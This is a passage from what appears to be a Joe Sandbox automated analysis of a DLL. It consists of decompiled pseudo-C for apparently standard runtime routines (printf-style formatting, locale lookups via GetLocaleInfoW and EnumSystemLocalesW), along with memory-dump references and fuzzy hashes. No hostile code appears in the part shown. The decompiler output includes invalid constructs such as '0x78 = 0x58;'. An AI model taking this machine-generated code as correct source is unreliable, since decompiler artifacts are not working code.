              							__eflags = _v12 ^ _t180;
              							_pop(_t137);
              							return E6DA89B91(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
              						} else {
              							goto L7;
              						}
              					}
              				} else {
              					_t130 = 0xc;
              					L4:
              					return _t130;
              				}
              			}

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3953c9256b9ec1e7424870db0ebe4d3f8e743d198f2ec4f5f22afd2339a74df6
              • Instruction ID: 4311f5df3057a01f5834754fff411dba27b12e93c67e918eddefbb36389c3db4
              • Opcode Fuzzy Hash: 3953c9256b9ec1e7424870db0ebe4d3f8e743d198f2ec4f5f22afd2339a74df6
              • Instruction Fuzzy Hash: C041D3B5819219AFDF10DF68CD88AAABBF8AF45304F1442D9E41DD7200DB359E858F20
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 89%
              			E6DA8F07E(signed int __ecx, signed int __edx, void* __edi) {
              				signed int _v8;
              				char _v16;
              				signed int _v18;
              				signed int _v20;
              				signed int _v24;
              				signed int* _v28;
              				signed int _v32;
              				signed int _v36;
              				void* __ebx;
              				void* __esi;
              				void* __ebp;
              				signed int _t115;
              				char _t117;
              				signed int _t118;
              				void* _t119;
              				signed int _t120;
              				signed char _t123;
              				signed int _t127;
              				signed char _t132;
              				signed char _t135;
              				signed int* _t141;
              				signed int _t145;
              				signed int _t149;
              				signed int _t150;
              				signed int* _t156;
              				signed int _t158;
              				signed int _t159;
              				signed int* _t160;
              				signed int* _t166;
              				signed char _t169;
              				signed char _t171;
              				signed int _t173;
              				signed int _t175;
              				signed int _t176;
              				signed int _t179;
              				signed int _t180;
              				signed int* _t181;
              				void* _t183;
              				signed int _t187;
              				unsigned int _t190;
              				signed int _t192;
              				signed int** _t193;
              				signed short* _t194;
              				signed char _t197;
              				signed int _t198;
              				signed int _t199;
              				intOrPtr _t211;
              				signed int _t214;
              				void* _t215;
              				signed int* _t216;
              				signed int _t217;
              				signed int _t218;
              				signed int** _t219;
              				signed int _t220;
              				void* _t221;
              				void* _t222;
              				void* _t223;
              
              				_t215 = __edi;
              				_t208 = __edx;
              				_t115 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t115 ^ _t220;
              				_t218 = __ecx;
              				_t179 = 0;
              				_v32 = __ecx;
              				_t183 = 0x58;
              				_t117 =  *((char*)(__ecx + 0x2d));
              				_t222 = _t117 - 0x64;
              				if(_t222 > 0) {
              					__eflags = _t117 - 0x70;
              					if(__eflags > 0) {
              						_t118 = _t117 - 0x73;
              						__eflags = _t118;
              						if(_t118 == 0) {
              							L9:
              							_t119 = E6DA8F790(_t218);
              							L10:
              							if(_t119 != 0) {
              								__eflags =  *((intOrPtr*)(_t218 + 0x2c)) - _t179;
              								if( *((intOrPtr*)(_t218 + 0x2c)) != _t179) {
              									L104:
              									_t120 = 1;
              									L105:
              									return E6DA89B91(_t120, _t179, _v8 ^ _t220, _t208, _t215, _t218);
              								}
              								_t123 =  *(_t218 + 0x1c) >> 4;
              								_v20 = _t179;
              								_t187 = _t179;
              								_v18 = _t179;
              								_v28 = _t187;
              								__eflags = 1 & _t123;
              								if((1 & _t123) == 0) {
              									L44:
              									_t211 =  *((intOrPtr*)(_t218 + 0x2d));
              									__eflags = _t211 - 0x78;
              									if(_t211 == 0x78) {
              										L46:
              										__eflags = 1;
              										if(1 != 0) {
              											L48:
              											__eflags = _t211 - 0x61;
              											if(_t211 == 0x61) {
              												L50:
              												_t127 = 1;
              												L51:
              												__eflags = _t127;
              												if(_t127 != 0) {
              													L53:
              													 *((char*)(_t220 + _t187 - 0x10)) = 0x30;
              													__eflags = _t211 - 0x58;
              													if(_t211 == 0x58) {
              														L56:
              														0x78 = 0x58;
              														L57:
              														 *((char*)(_t220 + _t187 - 0xf)) = 0x78;
              														_t187 = _t187 + 2;
              														__eflags = _t187;
              														_v28 = _t187;
              														L58:
              														_t208 =  *((intOrPtr*)(_t218 + 0x20)) -  *((intOrPtr*)(_t218 + 0x34)) - _t187;
              														__eflags =  *(_t218 + 0x1c) & 0x0000000c;
              														_push(_t215);
              														_v36 = _t208;
              														if(( *(_t218 + 0x1c) & 0x0000000c) != 0) {
              															L70:
              															_push( *((intOrPtr*)(_t218 + 8)));
              															_t216 = _t218 + 0x14;
              															_v28 = _t218 + 0x448;
              															E6DA8F907(_t218 + 0x448,  &_v20, _t187, _t216);
              															_t190 =  *(_t218 + 0x1c);
              															_t132 = _t190 >> 3;
              															__eflags = _t132 & 0x00000001;
              															if((_t132 & 0x00000001) == 0) {
              																L83:
              																__eflags =  *((char*)(_t218 + 0x38));
              																if( *((char*)(_t218 + 0x38)) == 0) {
              																	L91:
              																	_push( *((intOrPtr*)(_t218 + 8)));
              																	E6DA8F907(_t218 + 0x448,  *(_t218 + 0x30),  *((intOrPtr*)(_t218 + 0x34)), _t216);
              																	L92:
              																	_t192 =  *_t216;
              																	__eflags = _t192;
              																	if(_t192 < 0) {
              																		L103:
              																		_pop(_t215);
              																		goto L104;
              																	}
              																	_t135 =  *(_t218 + 0x1c) >> 2;
              																	__eflags = _t135 & 0x00000001;
              																	if((_t135 & 0x00000001) == 0) {
              																		goto L103;
              																	}
              																	_t218 = _v36;
              																	__eflags = _t218;
              																	if(_t218 <= 0) {
              																		goto L103;
              																	} else {
              																		goto L95;
              																	}
              																	while(1) {
              																		L95:
              																		_t208 =  *_v28;
              																		__eflags =  *((intOrPtr*)(_t208 + 8)) -  *((intOrPtr*)(_t208 + 4));
              																		if( *((intOrPtr*)(_t208 + 8)) !=  *((intOrPtr*)(_t208 + 4))) {
              																			_t193 = _v28;
              																			 *_t216 = _t192 + 1;
              																			 *((intOrPtr*)(_t208 + 8)) =  *((intOrPtr*)(_t208 + 8)) + 1;
              																			 *( *( *_t193)) = 0x20;
              																			_t141 =  *_t193;
              																			 *_t141 =  *_t141 + 1;
              																			__eflags =  *_t141;
              																			_t192 =  *_t216;
              																		} else {
              																			__eflags =  *((char*)(_t208 + 0xc));
              																			if( *((char*)(_t208 + 0xc)) == 0) {
              																				_t192 = _t192 | 0xffffffff;
              																				__eflags = _t192;
              																			} else {
              																				_t192 = _t192 + 1;
              																			}
              																			 *_t216 = _t192;
              																		}
              																		__eflags = _t192 - 0xffffffff;
              																		if(_t192 == 0xffffffff) {
              																			goto L103;
              																		}
              																		_t179 = _t179 + 1;
              																		__eflags = _t179 - _t218;
              																		if(_t179 < _t218) {
              																			continue;
              																		}
              																		goto L103;
              																	}
              																	goto L103;
              																}
              																__eflags =  *((intOrPtr*)(_t218 + 0x34)) - _t179;
              																if( *((intOrPtr*)(_t218 + 0x34)) <= _t179) {
              																	goto L91;
              																}
              																_t194 =  *(_t218 + 0x30);
              																_v20 = _t179;
              																while(1) {
              																	_v24 = _t179;
              																	_v32 =  &(_t194[1]);
              																	_t145 = E6DA95341(_t208,  &_v24,  &_v16, 6,  *_t194 & 0x0000ffff,  *((intOrPtr*)(_t218 + 8)));
              																	_t221 = _t221 + 0x14;
              																	__eflags = _t145;
              																	if(_t145 != 0) {
              																		break;
              																	}
              																	__eflags = _v24 - _t145;
              																	if(_v24 == _t145) {
              																		break;
              																	}
              																	_push( *((intOrPtr*)(_t218 + 8)));
              																	E6DA8F907(_t218 + 0x448,  &_v16, _v24, _t216);
              																	_t194 = _v32;
              																	_t149 = _v20 + 1;
              																	_v20 = _t149;
              																	__eflags = _t149 -  *((intOrPtr*)(_t218 + 0x34));
              																	if(_t149 !=  *((intOrPtr*)(_t218 + 0x34))) {
              																		continue;
              																	}
              																	goto L92;
              																}
              																 *_t216 =  *_t216 | 0xffffffff;
              																goto L92;
              															}
              															_t197 = _t190 >> 2;
              															__eflags = _t197 & 0x00000001;
              															if((_t197 & 0x00000001) != 0) {
              																goto L83;
              															}
              															_t198 = _v36;
              															_v20 = _t179;
              															__eflags = _t198;
              															if(_t198 <= 0) {
              																goto L83;
              															}
              															_t214 =  *_t216;
              															_t219 = _v28;
              															while(1) {
              																_t150 =  *_t219;
              																_v24 = _t150;
              																_t180 = _t150;
              																__eflags =  *((intOrPtr*)(_t150 + 8)) -  *((intOrPtr*)(_t180 + 4));
              																if( *((intOrPtr*)(_t150 + 8)) !=  *((intOrPtr*)(_t180 + 4))) {
              																	 *_t216 = _t214 + 1;
              																	 *((intOrPtr*)(_t180 + 8)) =  *((intOrPtr*)(_t180 + 8)) + 1;
              																	 *( *( *_t219)) = 0x30;
              																	_t156 =  *_t219;
              																	 *_t156 =  *_t156 + 1;
              																	__eflags =  *_t156;
              																	_t208 =  *_t216;
              																} else {
              																	_t159 = _t180;
              																	__eflags =  *((char*)(_t159 + 0xc));
              																	if( *((char*)(_t159 + 0xc)) == 0) {
              																		_t208 = _t208 | 0xffffffff;
              																		__eflags = _t208;
              																	} else {
              																		_t208 = _t208 + 1;
              																	}
              																	 *_t216 = _t208;
              																}
              																__eflags = _t208 - 0xffffffff;
              																if(_t208 == 0xffffffff) {
              																	break;
              																}
              																_t158 = _v20 + 1;
              																_v20 = _t158;
              																__eflags = _t158 - _t198;
              																if(_t158 < _t198) {
              																	continue;
              																}
              																break;
              															}
              															_t218 = _v32;
              															_t179 = 0;
              															__eflags = 0;
              															goto L83;
              														}
              														__eflags = _t208;
              														if(_t208 <= 0) {
              															goto L70;
              														}
              														_t217 =  *(_t218 + 0x14);
              														_t199 = _t179;
              														while(1) {
              															_t160 =  *(_t218 + 0x448);
              															_t181 =  *(_t218 + 0x448);
              															__eflags = _t160[2] - _t181[1];
              															if(_t160[2] != _t181[1]) {
              																 *(_t218 + 0x14) = _t217 + 1;
              																_t181[2] = _t181[2] + 1;
              																 *( *( *(_t218 + 0x448))) = 0x20;
              																_t166 =  *(_t218 + 0x448);
              																 *_t166 =  *_t166 + 1;
              																__eflags =  *_t166;
              																_t217 =  *(_t218 + 0x14);
              															} else {
              																__eflags = _t181[3];
              																if(_t181[3] == 0) {
              																	_t217 = _t217 | 0xffffffff;
              																	__eflags = _t217;
              																} else {
              																	_t217 = _t217 + 1;
              																}
              																 *(_t218 + 0x14) = _t217;
              															}
              															__eflags = _t217 - 0xffffffff;
              															if(_t217 == 0xffffffff) {
              																break;
              															}
              															_t199 = _t199 + 1;
              															__eflags = _t199 - _t208;
              															if(_t199 < _t208) {
              																continue;
              															}
              															break;
              														}
              														_t187 = _v28;
              														_t179 = 0;
              														__eflags = 0;
              														goto L70;
              													}
              													__eflags = _t211 - 0x41;
              													if(_t211 == 0x41) {
              														goto L56;
              													}
              													goto L57;
              												}
              												__eflags = _t127;
              												if(_t127 == 0) {
              													goto L58;
              												}
              												goto L53;
              											}
              											_t127 = _t179;
              											__eflags = _t211 - 0x41;
              											if(_t211 != 0x41) {
              												goto L51;
              											}
              											goto L50;
              										}
              										L47:
              										goto L48;
              									}
              									__eflags = _t211 - 0x58;
              									if(_t211 != 0x58) {
              										goto L47;
              									}
              									goto L46;
              								}
              								_t169 =  *(_t218 + 0x1c) >> 6;
              								__eflags = 1 & _t169;
              								if((1 & _t169) == 0) {
              									__eflags =  *(_t218 + 0x1c) & 1;
              									if(( *(_t218 + 0x1c) & 1) == 0) {
              										_t171 =  *(_t218 + 0x1c) >> 1;
              										__eflags = 1 & _t171;
              										if((1 & _t171) != 0) {
              											_v20 = 0x20;
              											_t187 = 1;
              											_v28 = 1;
              										}
              										goto L44;
              									}
              									_v20 = 0x2b;
              									L41:
              									_t187 = 1;
              									_v28 = 1;
              									goto L44;
              								}
              								_v20 = 0x2d;
              								goto L41;
              							}
              							L11:
              							_t120 = 0;
              							goto L105;
              						}
              						_t173 = _t118;
              						__eflags = _t173;
              						if(__eflags == 0) {
              							L28:
              							_t119 = E6DA8E41E(_t218, __eflags, _t179);
              							goto L10;
              						}
              						__eflags = _t173 - 3;
              						if(__eflags != 0) {
              							goto L11;
              						}
              						_push(0);
              						L13:
              						_t119 = E6DA8E59B(_t218, __eflags);
              						goto L10;
              					}
              					if(__eflags == 0) {
              						_t119 = E6DA8F77A(__ecx);
              						goto L10;
              					}
              					__eflags = _t117 - 0x67;
              					if(_t117 <= 0x67) {
              						L29:
              						_t119 = E6DA8F4BA(_t179, _t218);
              						goto L10;
              					}
              					__eflags = _t117 - 0x69;
              					if(_t117 == 0x69) {
              						L27:
              						_t4 = _t218 + 0x1c;
              						 *_t4 =  *(_t218 + 0x1c) | 0x00000010;
              						__eflags =  *_t4;
              						goto L28;
              					}
              					__eflags = _t117 - 0x6e;
              					if(_t117 == 0x6e) {
              						_t119 = E6DA8F6D9(__ecx, __edx);
              						goto L10;
              					}
              					__eflags = _t117 - 0x6f;
              					if(_t117 != 0x6f) {
              						goto L11;
              					}
              					_t119 = E6DA8F75D(__ecx);
              					goto L10;
              				}
              				if(_t222 == 0) {
              					goto L27;
              				}
              				_t223 = _t117 - _t183;
              				if(_t223 > 0) {
              					_t175 = _t117 - 0x5a;
              					__eflags = _t175;
              					if(_t175 == 0) {
              						_t119 = E6DA8F460(__ecx);
              						goto L10;
              					}
              					_t176 = _t175 - 7;
              					__eflags = _t176;
              					if(_t176 == 0) {
              						goto L29;
              					}
              					__eflags = _t176;
              					if(__eflags != 0) {
              						goto L11;
              					}
              					L17:
              					_t119 = E6DA8F644(_t179, _t218, _t208, __eflags, _t179);
              					goto L10;
              				}
              				if(_t223 == 0) {
              					_push(1);
              					goto L13;
              				}
              				if(_t117 == 0x41) {
              					goto L29;
              				}
              				if(_t117 == 0x43) {
              					goto L17;
              				}
              				if(_t117 <= 0x44) {
              					goto L11;
              				}
              				if(_t117 <= 0x47) {
              					goto L29;
              				}
              				if(_t117 != 0x53) {
              					goto L11;
              				}
              				goto L9;
              			}





























































              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 6ffe0e9a259b114ebf205106e5d05e75eecdf215e03385ce746514196cb1b6b3
              • Instruction ID: 7cb8c680aa0b389c44b8a10ce5ac70fbc158d2b0bccbe362f49cb5acac620ba1
              • Opcode Fuzzy Hash: 6ffe0e9a259b114ebf205106e5d05e75eecdf215e03385ce746514196cb1b6b3
              • Instruction Fuzzy Hash: 26C1FE38A0C74B8FCB11CE68C48067ABBB1FB46314F14865DDDA297292E335A8C6CB41
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 64%
              			E6DA9C614(void* __ecx, void* __edx, intOrPtr _a4) {
              				signed int _v8;
              				short _v248;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t15;
              				signed int _t21;
              				void* _t23;
              				void* _t30;
              				void* _t32;
              				signed int _t41;
              				signed int* _t47;
              				int _t49;
              				signed int _t50;
              
              				_t46 = __edx;
              				_t15 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t15 ^ _t50;
              				_t48 = _a4;
              				_t32 = E6DA92BDC(__ecx, __edx, _a4);
              				_t47 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
              				_t49 = E6DA9C6E9(_t48);
              				asm("sbb ecx, ecx");
              				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
              				if(_t21 != 0) {
              					_t23 = E6DA990B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
              					_t41 =  *(_t32 + 0x60);
              					if(_t23 != 0) {
              						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
              							_t30 = E6DA990B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
              							if(_t30 == 0) {
              								_push(_t47);
              								_push(_t30);
              								goto L9;
              							}
              						}
              					} else {
              						if(_t41 != 0) {
              							L10:
              							 *_t47 =  *_t47 | 0x00000004;
              							_t47[1] = _t49;
              							_t47[2] = _t49;
              						} else {
              							_push(_t47);
              							_push(1);
              							L9:
              							_push(_t49);
              							if(E6DA9C843() != 0) {
              								goto L10;
              							}
              						}
              					}
              					_t27 =  !( *_t47 >> 2) & 0x00000001;
              				} else {
              					 *_t47 =  *_t47 & _t21;
              					_t27 = _t21 + 1;
              				}
              				return E6DA89B91(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
              			}



















              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C668
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: 0b1efd6c4e5d462103036b2c40a1453ab499bd91a6bb0c4982a5da03858475ec
              • Instruction ID: 2b4be8fd2c0136fa7577e56019ef6d551198b20ad5dcb9e06efff2f5c42ea140
              • Opcode Fuzzy Hash: 0b1efd6c4e5d462103036b2c40a1453ab499bd91a6bb0c4982a5da03858475ec
              • Instruction Fuzzy Hash: EB21B07666D607ABEB189F29CD41ABA73F8EF09314F04607AFF01CA140EB349980DB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E6DA9C29B(void* __ecx, void* __edx, signed int* _a4) {
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t26;
              				intOrPtr _t29;
              				signed int _t32;
              				signed char _t33;
              				signed char _t34;
              				intOrPtr* _t38;
              				intOrPtr* _t41;
              				signed int _t47;
              				void* _t50;
              				void* _t51;
              				signed int* _t52;
              				void* _t53;
              				void* _t54;
              				signed int _t62;
              
              				_t54 = E6DA92BDC(__ecx, __edx, _t53);
              				_t47 = 2;
              				_t38 =  *((intOrPtr*)(_t54 + 0x50));
              				_t50 = _t38 + 2;
              				do {
              					_t26 =  *_t38;
              					_t38 = _t38 + _t47;
              				} while (_t26 != 0);
              				_t41 =  *((intOrPtr*)(_t54 + 0x54));
              				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
              				_t51 = _t41 + 2;
              				do {
              					_t29 =  *_t41;
              					_t41 = _t41 + _t47;
              				} while (_t29 != 0);
              				_t52 = _a4;
              				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
              				_t52[1] = 0;
              				if( *(_t54 + 0x60) == 0) {
              					_t47 = E6DA9C395( *((intOrPtr*)(_t54 + 0x50)));
              				}
              				 *(_t54 + 0x5c) = _t47;
              				_t32 = EnumSystemLocalesW(E6DA9C3C1, 1);
              				_t62 =  *_t52 & 0x00000007;
              				asm("bt ecx, 0x9");
              				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
              				asm("bt ecx, 0x8");
              				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
              				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
              					 *_t52 = 0;
              					return _t34;
              				}
              				return _t34;
              			}




















              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • EnumSystemLocalesW.KERNEL32(6DA9C3C1,00000001,00000000,?,-00000050,?,6DA9C9F2,00000000,?,?,?,00000055,?), ref: 6DA9C30D
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 1323dc192890057d6236e34f2b70ec53e58cd2ffb8a929a4ac83735088091412
              • Instruction ID: 27324880d47381c7e6ec9772b7731a59212a62e9944619fc7d8b4253cc708bfc
              • Opcode Fuzzy Hash: 1323dc192890057d6236e34f2b70ec53e58cd2ffb8a929a4ac83735088091412
              • Instruction Fuzzy Hash: EF11293B2187015FDB089F39C8906BABBE1FF84318B19442CD9864BA40D7756583C740
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6DA9C843(signed int _a4, intOrPtr _a8) {
              				short _v8;
              				void* __ecx;
              				void* __esi;
              				void* __ebp;
              				void* _t8;
              				void* _t11;
              				intOrPtr _t13;
              				void* _t15;
              				void* _t19;
              				void* _t21;
              				void* _t23;
              				void* _t25;
              				signed int _t26;
              				intOrPtr* _t28;
              
              				_push(_t15);
              				_push(_t25);
              				_t8 = E6DA92BDC(_t15, _t21, _t25);
              				_t26 = _a4;
              				_t23 = _t8;
              				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
              					L7:
              					_t11 = 0;
              				} else {
              					if(_t26 == _v8 || _a8 == 0) {
              						L6:
              						_t11 = 1;
              					} else {
              						_t28 =  *((intOrPtr*)(_t23 + 0x50));
              						_t19 = _t28 + 2;
              						do {
              							_t13 =  *_t28;
              							_t28 = _t28 + 2;
              						} while (_t13 != 0);
              						if(E6DA9C395( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
              							goto L7;
              						} else {
              							goto L6;
              						}
              					}
              				}
              				return _t11;
              			}


















              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6DA9C5DD,00000000,00000000,?), ref: 6DA9C86F
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: b2a1ddc1532976e3a4ed4a0481dfec627f1e8f2baa7751b4fc9aa3583d358b7a
              • Instruction ID: 45475d91b81ef87bf4bcfdd182291cd14c7f401aad641c6a040efb80d78eab20
              • Opcode Fuzzy Hash: b2a1ddc1532976e3a4ed4a0481dfec627f1e8f2baa7751b4fc9aa3583d358b7a
              • Instruction Fuzzy Hash: 4BF0F976528617ABDB144A20C805BBA77E8EF80754F098424DD16AB180EA74FAC2C690
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6DA9C1A9(void* __ecx, void* __edx, intOrPtr _a4) {
              				signed int _v8;
              				short _v248;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t11;
              				void* _t13;
              				signed int _t17;
              				signed int* _t39;
              				int _t41;
              				signed int _t42;
              
              				_t38 = __edx;
              				_t11 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t11 ^ _t42;
              				_t40 = _a4;
              				_t13 = E6DA92BDC(__ecx, __edx, _a4);
              				_t26 = _t13;
              				_t39 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
              				_t41 = E6DA9C6E9(_t40);
              				asm("sbb ecx, ecx");
              				_t17 = GetLocaleInfoW(_t41, ( ~( *(_t13 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
              				if(_t17 != 0) {
              					if(E6DA990B4(_t39, _t41,  *((intOrPtr*)(_t26 + 0x54)),  &_v248) == 0 && E6DA9C81E(_t41) != 0) {
              						 *_t39 =  *_t39 | 0x00000004;
              						_t39[2] = _t41;
              						_t39[1] = _t41;
              					}
              					_t23 =  !( *_t39 >> 2) & 0x00000001;
              				} else {
              					 *_t39 =  *_t39 & _t17;
              					_t23 = _t17 + 1;
              				}
              				return E6DA89B91(_t23, _t26, _v8 ^ _t42, _t38, _t39, _t41);
              			}
















              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA9C1FD
              Strings
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID: utf8
              • API String ID: 3736152602-905460609
              • Opcode ID: 78315a3d9f4b81cc6c699cb4c00caa2d1cc33c7647b6b5bbfa870a75732e1915
              • Instruction ID: 64469b11121b4654dac34e423e4293ba09fc8efd14742afef7c1d7d6c0ba9717
              • Opcode Fuzzy Hash: 78315a3d9f4b81cc6c699cb4c00caa2d1cc33c7647b6b5bbfa870a75732e1915
              • Instruction Fuzzy Hash: B4F0F472628205AFC714AF74D945AFA33E8DF49314F06407AA602DB240EB78AD458750
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA9C336(void* __ecx, void* __edx, signed char* _a4) {
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t11;
              				signed char* _t15;
              				intOrPtr* _t19;
              				intOrPtr _t24;
              				void* _t25;
              				void* _t26;
              				void* _t27;
              
              				_t27 = E6DA92BDC(__ecx, __edx, _t26);
              				_t24 = 2;
              				_t19 =  *((intOrPtr*)(_t27 + 0x50));
              				_t25 = _t19 + 2;
              				do {
              					_t11 =  *_t19;
              					_t19 = _t19 + _t24;
              				} while (_t11 != 0);
              				_t4 = _t19 - _t25 >> 1 == 3;
              				 *(_t27 + 0x60) = 0 | _t4;
              				if(_t4 != 0) {
              					_t24 = E6DA9C395( *((intOrPtr*)(_t27 + 0x50)));
              				}
              				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
              				EnumSystemLocalesW(E6DA9C614, 1);
              				_t15 = _a4;
              				if(( *_t15 & 0x00000004) == 0) {
              					 *_t15 = 0;
              					return _t15;
              				}
              				return _t15;
              			}













              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
